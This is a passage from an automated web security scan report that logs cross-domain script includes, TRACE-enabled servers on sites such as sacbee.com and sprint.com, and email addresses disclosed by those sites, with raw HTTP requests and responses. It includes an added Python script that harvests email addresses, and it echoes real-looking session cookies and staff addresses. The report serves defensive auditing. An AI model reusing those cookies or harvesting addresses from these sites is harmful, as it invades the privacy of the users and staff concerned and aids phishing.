Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:40 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<link href="http://grfx.cstv.com/schools/nd/library/css/nd-09-display.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://grfx.cstv.com/scripts/common.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/scripts/oas-omni-controls.js"></script>
       <script type="text/javascript" src="http://grfx.cstv.com/schools/nd/library/scripts/nd-09-tabs.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" language="javascript" src="http://grfx.cstv.com/flash/video/flv_player.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://graphics.fansonly.com/scripts/flash-embed2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...
<!-- CNET tag for reporting OAS traffic -->
<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...

19.46. http://www.und.com/sports/m-footbl/9874134

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/m-footbl/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:45 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<link href="http://grfx.cstv.com/schools/nd/library/css/nd-09-display.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://grfx.cstv.com/scripts/common.js"></script>
<script type="text/javascript" src="http://grfx.cstv.com/scripts/oas-omni-controls.js"></script>
       <script type="text/javascript" src="http://grfx.cstv.com/schools/nd/library/scripts/nd-09-tabs.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" language="javascript" src="http://grfx.cstv.com/flash/video/flv_player.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://graphics.fansonly.com/scripts/flash-embed2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...
<!-- CNET tag for reporting OAS traffic -->
<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...

19.47. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wisdomtree.com
Path:   /bannerads/dyneld2010fall/dyneld2010falllp.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bannerads/dyneld2010fall/dyneld2010falllp.html HTTP/1.1
Host: www.wisdomtree.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 28427
Content-Type: text/html
Last-Modified: Mon, 28 Feb 2011 22:22:29 GMT
Accept-Ranges: bytes
ETag: "ccb960fc95d7cb1:4c1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:03 GMT
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.48. http://www.youtube.com/embed/xXftjfC3b5o

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/xXftjfC3b5o

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /embed/xXftjfC3b5o HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=f_pXTnp7lsc; PREF=fv=10.3.183

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 18487
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>Summary of State Collective Bargaining Agreements - YouTube</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflIi8lfi.css">


...[SNIP]...
</div>


<script src="//s.ytimg.com/yt/jsbin/www-embed_core_module-vflXhboHY.js"></script>
...[SNIP]...

20. TRACE method is enabled
There are 15 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

20.1. http://bh.contextweb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: f241348312199b3

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Content-Type: message/http
Content-Length: 255
Date: Sun, 04 Sep 2011 00:56:36 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: f241348312199b3; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2; pb_rtb_ev="1:535461.2925993182975414771.0"
connection: Keep-Alive
cw-userhostaddress: 50.23.123.106

20.2. http://blogs.sacbee.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.sacbee.com
Path:   /

Request

TRACE / HTTP/1.0
Host: blogs.sacbee.com
Cookie: 64ddfb1320eb069f

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:07 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: blogs.sacbee.com
Cookie: 64ddfb1320eb069f; sacbee_user_auth=.threshold%7c.threshold%7cacv-5_2%7cx%7c1%7cMDVqbGpwenh0em5wfHYwMGptOW5sbGxudGwgcXJtdHB2dCAwdjlqMHZ2cnRrb3F6bGs5cjlqdDlua25wbnRybXFyMHF6dG0wdG54MHA%3d; s_cc=true; s_vnum=131744520036
...[SNIP]...

20.3. http://community.sprint.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /

Request

TRACE / HTTP/1.0
Host: community.sprint.com
Cookie: 3ccfac9e56fc122

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:45 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: community.sprint.com
Cookie: 3ccfac9e56fc122; JSESSIONID=0D696C3D1AE0B0035F1215A93D5B6A03.LB5; jive.server.info="serverName=community.sprint.com:serverPort=80:contextPath=/baw:localName=localhost:localPort=9001:localAddr=127.0.0.1"; jive.recentH
...[SNIP]...

20.4. http://image2.pubmatic.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: f626da1c15f00e8

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:34 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: f626da1c15f00e8; KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; PUBRETARGET=78_1409703834.82_1409705283


20.5. http://imp.fetchback.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: 59dda222265aa6fc

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: 59dda222265aa6fc; cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097285_34021:68285:1:0:0_34024:68283:2:234:326_34024:68292:2:119122:119204_34023:6
...[SNIP]...

20.6. http://log.c12s.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://log.c12s.com
Path:   /

Request

TRACE / HTTP/1.0
Host: log.c12s.com
Cookie: e936cd229a56da57

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sun, 04 Sep 2011 00:47:48 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 204
Connection: Close

TRACE / HTTP/1.1
host: log.c12s.com
Cookie: e936cd229a56da57; aid=10.87.42.144.1315097001140001
X-Forwarded-For: 50.23.123.106
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive


20.7. http://m.xp1.ru4.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /

Request

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: b8188b70cdea3a7e

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 00:55:53 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: b8188b70cdea3a7e; X1ID=BO-00000000670935830; O62795=0
Connection: Keep-Alive
X-xp1-forwarded-for: 50.23.123.106


20.8. http://mi.adinterax.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mi.adinterax.com
Path:   /

Request

TRACE / HTTP/1.0
Host: mi.adinterax.com
Cookie: faa5250c95d89ec6

Response

HTTP/1.1 200 OK
Server: Footprint 4.8/FPMCP
Mime-Version: 1.0
Date: Sun, 04 Sep 2011 00:59:10 GMT
Content-Type: message/http
Content-Length: 150
Expires: Sun, 04 Sep 2011 00:59:10 GMT
Connection: close

TRACE / HTTP/1.0
Host: mi.adinterax.com
Cookie: faa5250c95d89ec6; adxid=01345f4e62cacd40; adxf=696749@1@221
_FP_X_URL: http://mi.adinterax.com/


20.9. http://optimized-by.rubiconproject.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: 88223c8e26499cac

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:59 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 88223c8e26499cac; put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi
...[SNIP]...

20.10. http://r.openx.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 6612f5336890e8b9

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:48 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 6612f5336890e8b9; i=d2a43928-76cd-49ea-b899-b41fb371435f
X-Forwarded-For: 50.23.123.106


20.11. http://rt.legolas-media.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /

Request

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 5c2d70d754ab6c59

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:52:16 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 5c2d70d754ab6c59; ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgdv12=1; lgdv6=1; lgdv95=1; lgdv73=1; lgtix=BgABADMBSQABADMBHAADADMBDAABADMB/QABADABXwABADMB


20.12. http://sales.reuters.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.reuters.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sales.reuters.com
Cookie: 130d0eb225d04c5b

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:41:04 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sales.reuters.com
Cookie: 130d0eb225d04c5b; tns=dataSource=cookie; __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26dat
...[SNIP]...

20.13. http://tacoda.at.atwola.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tacoda.at.atwola.com
Cookie: a854573d9f404231

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:05:46 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: a854573d9f404231; ANRTT=; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; Tsid=0^1315097086^1315100145|17778^1315097086^1315098886|11684^1315097306^1315100145; ATTACID=a3Z0aWQ9MTc
...[SNIP]...

20.14. http://www.sprint.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sprint.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sprint.com
Cookie: bdc6f1a797b283a7

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:35 GMT
Server: Apache/2.2.14 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.sprint.com
Cookie: bdc6f1a797b283a7; TLTSID=105E1B5AD68B10D605E2BDF5FE0A4306; TLTUID=105E1B5AD68B10D605E2BDF5FE0A4306; Apache=50.23.123.106.1315095358451950; TLisset=true; mbox=check#true#1315097121|session#1315097027971-178294#13150989
...[SNIP]...

20.15. https://www.sprint.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sprint.net
Cookie: 2f3199ae5bdd5ac1

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:32 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Client-IP: 50.23.123.106
Host: www.sprint.net
Cookie: 2f3199ae5bdd5ac1; ServerID=1125


21. Email addresses disclosed
There are 8 instances of this issue:

Issue background

An email address in an application response is not by itself a vulnerability. Addresses appear legitimately in contact information, and many applications (web mail, news feeds) carry arbitrary third-party addresses as their core content.

Addresses of developers and staff, whether rendered on screen or left in page source, CSS or JavaScript, do give an attacker something: they are often valid usernames for the application's own login or for the organisation's mail and VPN, they name real people for phishing and other social engineering, and they attract spam. The instances below cover the usual cases: a developer's address in a CSS file comment (21.3), staff mailto: links and RSS author and credit fields (21.2, 21.6), a vendor's feedback address embedded in a JavaScript library (21.4), and addresses that merely pass through a third-party feed proxy (21.5 and 21.6, where Google's feed API returns sacbee.com feed content, so the disclosure originates with the feed publisher rather than with www.google.com). The Issue detail entries below do not list the matched addresses; read them from the response excerpts. For 21.1 the excerpt is a 42-byte GIF with no address in view, so that instance cannot be confirmed from the evidence shown.

Issue remediation

Review the addresses the application discloses and remove any that are unnecessary: strip author tags and other comments from CSS and JavaScript at build time, and replace personal addresses with role mailboxes (such as helpdesk@example.com) where a contact is needed. Where addresses double as login usernames, make sure the login enforces lockout or rate limiting, since the disclosed list is effectively a username list.
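The review step above, as an added example that is not the scanner's own check and not part of the original report: a scanner over captured response bodies of the kinds shown in the instances below (HTML mailto: links, CSS and JavaScript comments, and JSONP carrying \u003c-escaped XML) that decodes the wrapping, extracts addresses, drops multi-@ cookie tokens that a naive regex would match, and sorts the results into role mailboxes and personal addresses. The sample bodies, the example.com addresses and the list of role local parts are constructed assumptions.

```python
"""Added example (not the scanner's own check): pull e-mail addresses out of
captured response bodies of the kinds shown in the report (HTML mailto: links,
CSS and JavaScript comments, JSONP that carries \\u003c-escaped XML), then sort
them into role mailboxes and personal addresses for the remediation review."""
import html
import re
from urllib.parse import unquote

# The local part must not be preceded by another address character; this drops
# multi-@ tokens such as tracking-cookie values ("0@1@4e60f636@www.example.net").
EMAIL_RE = re.compile(
    r"(?<![A-Za-z0-9._%@+-])[A-Za-z0-9._%+-]+@(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}"
)
# Assumed list of shared mailboxes, the acceptable replacements the remediation asks for.
ROLE_LOCALPARTS = {"webmaster", "postmaster", "hostmaster", "abuse", "feedback",
                   "helpdesk", "support", "info", "noreply", "no-reply"}


def normalise_body(text: str) -> str:
    """Undo the encodings a response may wrap an address in before matching."""
    # JavaScript/JSON \uXXXX escapes, as in the Gfeeds JSONP payloads.
    text = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    # HTML entities, twice to cover double-encoded feed content (&amp;#xE9; -> é).
    text = html.unescape(html.unescape(text))
    # Percent-encoding inside mailto: hrefs (jsmith%40example.com).
    return unquote(text)


def classify(addr: str) -> str:
    """'role' for shared mailboxes, 'personal' for everything else."""
    local = addr.split("@", 1)[0].lower()
    return "role" if local in ROLE_LOCALPARTS or local.endswith("-feedback") else "personal"


def audit_responses(bodies: dict) -> dict:
    """Map each address found to its kind, hit count and the responses it appeared in."""
    found = {}
    for source, body in bodies.items():
        for m in EMAIL_RE.finditer(normalise_body(body)):
            addr = m.group(0).lower()
            entry = found.setdefault(addr, {"kind": classify(addr), "count": 0, "where": []})
            entry["count"] += 1
            if source not in entry["where"]:
                entry["where"].append(source)
    for entry in found.values():
        entry["where"].sort()
    return found


# Constructed sample bodies (example.com addresses) mirroring the cases in the report:
# mailto: links, a CSS @author comment, \u-escaped JSONP and a multi-@ cookie value.
SAMPLE_RESPONSES = {
    "html": ('<a href="mailto:feedback@example.com">Feedback</a>'
             '<a class="fn email" href="mailto:jsmith%40example.com">J. Smith</a>'
             '<a href="mailto:jsmith@example.com">jsmith@example.com</a>'),
    "css": "/**\n * Blog Styles\n * @author Pat Lee <plee@example.com>\n */\nh1 { margin: 0 }",
    "jsonp": ('cb({"xmlString":"\\u003cauthor\\u003ewmount@example.com (W. Mount)'
              '\\u003c/author\\u003e\\u003ccredit\\u003eRen\\u0026amp;#xE9;e Byer/rbyer@example.com'
              '\\u003c/credit\\u003e"})'),
    "cookie_noise": "Set-Cookie: vsd=0@1@4e60f636@www.example.net; path=/",
}

if __name__ == "__main__":
    for addr, info in sorted(audit_responses(SAMPLE_RESPONSES).items()):
        print(f"{addr:28} {info['kind']:8} x{info['count']} in {', '.join(info['where'])}")
```

Decoding before matching matters here: the Gfeeds responses in 21.5 and 21.6 are JSONP whose XML is \u-escaped, and the sacbee feed double-encodes accented names, so a regex run over the raw body would miss addresses that sit next to escaped markup. The lookbehind is a heuristic against tracking-cookie values with several @ signs; it does not validate addresses, so treat the output as candidates for the manual review the remediation describes.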


21.1. http://ads.adbrite.com/adserver/vdi/742697

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/742697?d=2925993182975414771 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb2=EAE; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirOLM3IrzEsr0xMN6sxqjEsyShW0lFKSszLSy3KBKtQqq0FAA%3D%3D"; vsd=0@1@4e60f636@www.garage4hackers.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:57:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4e62ccf1@cdn.turn.com; path=/; domain=.adbrite.com; expires=Tue, 06-Sep-2011 00:57:21 GMT
Set-Cookie: rb2=CiMKBjc0MjY5NxjDupW2NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; path=/; domain=.adbrite.com; expires=Sat, 03-Dec-2011 00:57:21 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

21.2. http://blogs.sacbee.com/the_state_worker/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.sacbee.com
Path:   /the_state_worker/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /the_state_worker/ HTTP/1.1
Host: blogs.sacbee.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sacbee_user_auth=.threshold%7c.threshold%7cacv-5_2%7cx%7c1%7cMDVqbGpwenh0em5wfHYwMGptOW5sbGxudGwgcXJtdHB2dCAwdjlqMHZ2cnRrb3F6bGs5cjlqdDlua25wbnRybXFyMHF6dG0wdG54MHA%3d; s_cc=true; s_vnum=1317445200364%26vn%3D1; s_ppv=100; mi_ppu=http%3A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html; s_invisit=true; mi_ppn=Story%3A%203883102%7CSprint%20could%20be%20winner%20in%20thwarted%20T-Mobile-AT%26T%20deal; mi_pph=3000; mi_pvh=1000; mi_ppl=*Story; s_sq=nmsacramento%3D%2526pid%253DStory%25253A%2525203883102%25257CSprint%252520could%252520be%252520winner%252520in%252520thwarted%252520T-Mobile-AT%252526T%252520deal%2526pidt%253D1%2526oid%253Dhttp%25253A//blogs.sacbee.com/the_state_worker/%252523navlink%25253Dnavdrop%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:07 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a class="fn email" href="mailto:jortiz@sacbee.com">
...[SNIP]...
<a href='mailto:jortiz@sacbee.com'>jortiz@sacbee.com</a>
...[SNIP]...
<a href="mailto:webmaster@sacbee.com">
...[SNIP]...

21.3. http://media.sacbee.com/static/styles/blog_styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.sacbee.com
Path:   /static/styles/blog_styles.css

Issue detail

The following email address was disclosed in the response:

Request

GET /static/styles/blog_styles.css HTTP/1.1
Host: media.sacbee.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sacbee_user_auth=.threshold%7c.threshold%7cacv-5_2%7cx%7c1%7cMDVqbGpwenh0em5wfHYwMGptOW5sbGxudGwgcXJtdHB2dCAwdjlqMHZ2cnRrb3F6bGs5cjlqdDlua25wbnRybXFyMHF6dG0wdG54MHA%3d; s_cc=true; s_vnum=1317445200364%26vn%3D1; s_ppv=100; mi_ppu=http%3A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html; s_invisit=true; mi_ppn=Story%3A%203883102%7CSprint%20could%20be%20winner%20in%20thwarted%20T-Mobile-AT%26T%20deal; mi_pph=3000; mi_pvh=1000; mi_ppl=*Story; s_sq=nmsacramento%3D%2526pid%253DStory%25253A%2525203883102%25257CSprint%252520could%252520be%252520winner%252520in%252520thwarted%252520T-Mobile-AT%252526T%252520deal%2526pidt%253D1%2526oid%253Dhttp%25253A//blogs.sacbee.com/the_state_worker/%252523navlink%25253Dnavdrop%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Fri, 06 May 2011 18:20:56 GMT
ETag: "1327514-e11-4dc43c08"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3601
Date: Sun, 04 Sep 2011 00:48:02 GMT
Connection: close

/**
* Blog Styles
*
* Global styles for the MT blogs.
* @author Marc Matteo <mamatteo@sacbee.com>
*/

/**
* @section Main elements
*/
h1 {
/*
   margin-bottom: 8px;
   padding-bottom: 8px;
   border-
...[SNIP]...

21.4. http://s.meebocdn.net/cim/script/cim_v92_cim_11_12_4.en.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.meebocdn.net
Path:   /cim/script/cim_v92_cim_11_12_4.en.js

Issue detail

The following email address was disclosed in the response:

Request

